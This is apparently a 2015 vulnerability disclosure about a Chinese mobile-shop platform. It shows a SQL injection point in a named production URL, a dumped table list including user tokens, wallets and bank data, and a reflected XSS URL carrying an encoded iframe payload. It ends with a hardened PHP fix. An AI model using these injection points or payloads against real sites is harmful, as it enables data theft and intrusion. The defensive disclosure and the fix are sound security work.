

Koudai Gouwu Weidian (口袋购物微店) injection exposes sensitive data - Website Security

Source: zixuephp.com (自学PHP网)    Time: 2015-04-15 15:00


The Koudai Gouwu Weidian (口袋购物微店) site has SQL injection, cross-site scripting and other issues.


Injection point: http://wd.koudai.com/vshop/1/H5/H5ShopInfo.php?userid=52&callback=jsonpcallback_1400737639575_8703400159720331&ver=51402

The userid parameter is injectable:



+-------------------------+
| account_statistics      |
| account_type            |
| active                  |
| address                 |
| address_book            |
| admin_contact           |
| android_info            |
| black_list              |
| bmb_task                |
| buyer_action            |
| buyer_identity          |
| buyer_info              |
| buyer_note              |
| buyer_ua                |
| cate_info               |
| cate_item               |
| complaint               |
| csc_task                |
| csc_task_process        |
| custom                  |
| custom_detail           |
| custom_group            |
| custom_order            |
| express_info            |
| express_note            |
| express_state_info      |
| friend_dynamic          |
| gps                     |
| ios_info                |
| item_bg_category        |
| item_info               |
| item_sku                |
| item_souce              |
| login_info              |
| market_apply            |
| market_record           |
| market_seller_item      |
| market_user             |
| offer_price             |
| order_chargeback        |
| order_desc_info         |
| order_discount          |
| order_fr                |
| order_fr_info           |
| order_info              |
| order_pay               |
| order_refund            |
| order_status_history    |
| order_warrant           |
| pay_batch_no            |
| pay_commission_batch_no |
| pay_commission_note     |
| pay_detail              |
| pay_history             |
| pay_note                |
| pay_seller_id           |
| pay_task                |
| pay_withdrawals_num     |
| phone_valid             |
| role_action             |
| role_info               |
| seal_off                |
| sell_summary            |
| shop_friend             |
| sms_log                 |
| summary_info            |
| tb_move_status          |
| unpay_detail            |
| unpay_list              |
| unpay_order             |
| update_bank_num         |
| user_action             |
| user_bank               |
| user_device             |
| user_discount           |
| user_feedback           |
| user_info               |
| user_key                |
| user_token              |
| user_truename_note      |
| user_union              |
| user_union_msg          |
| user_wallet             |
| user_wallet_workflow    |
| web_feedback            |
| web_notice              |
| white_list              |
| wholesale_info          |
+-------------------------+




In addition, the callback parameter is not properly filtered either: the JSONP callback name is reflected into the response without escaping.

http://wd.koudai.com/wd/cate/getList?callback=jsonpcallback_1400737646118_061060125241056085%22%27%3E%3C%2Fiframe%3E%3CIFRAME+SRC%3D%22www.baidu.com%22%3E&ver=51402&param=123

Fix:

Apply proper filtering.
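As an added example that is not the site's own code, this is how a PHP JSONP endpoint like H5ShopInfo.php can be hardened against both problems above: userid is bound as an integer parameter instead of being concatenated into SQL, and the callback name is restricted to a plain JavaScript identifier so the iframe payload cannot reach the response. The table name shop_info, its columns and the DSN credentials are assumptions.

```php
<?php
// Added example (not the site's code): hardened JSONP shop-info endpoint.
// Table shop_info, its columns and the DSN/credentials are assumptions.
declare(strict_types=1);

// Accept only a plain JavaScript identifier as the JSONP callback name.
// Quotes, '<', '>' and '/' are rejected, so a "><iframe ...> style value
// never gets written into the response body.
function validCallback(string $cb): bool {
    return (bool) preg_match('/\A[A-Za-z_$][A-Za-z0-9_$]{0,63}\z/', $cb);
}

// userid is an int bound as a parameter; the SQL text itself never changes.
function fetchShop(PDO $db, int $userid): ?array {
    $stmt = $db->prepare('SELECT shop_name, shop_desc FROM shop_info WHERE userid = :uid');
    $stmt->bindValue(':uid', $userid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$userid   = filter_input(INPUT_GET, 'userid', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
$callback = $_GET['callback'] ?? 'callback';

if ($userid === false || $userid === null || !validCallback($callback)) {
    http_response_code(400);   // reject instead of trying to "clean" bad input
    exit;
}

$db = new PDO('mysql:host=localhost;dbname=vshop;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
]);

$data = fetchShop($db, $userid) ?? [];

// Correct content type plus nosniff stops the browser rendering the reply as
// HTML even if something unexpected ended up in it.
header('Content-Type: application/javascript; charset=utf-8');
header('X-Content-Type-Options: nosniff');
// JSON_HEX_* escapes < > & ' " so database content cannot break out of the
// script context either.
echo $callback, '(', json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT), ');';
```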
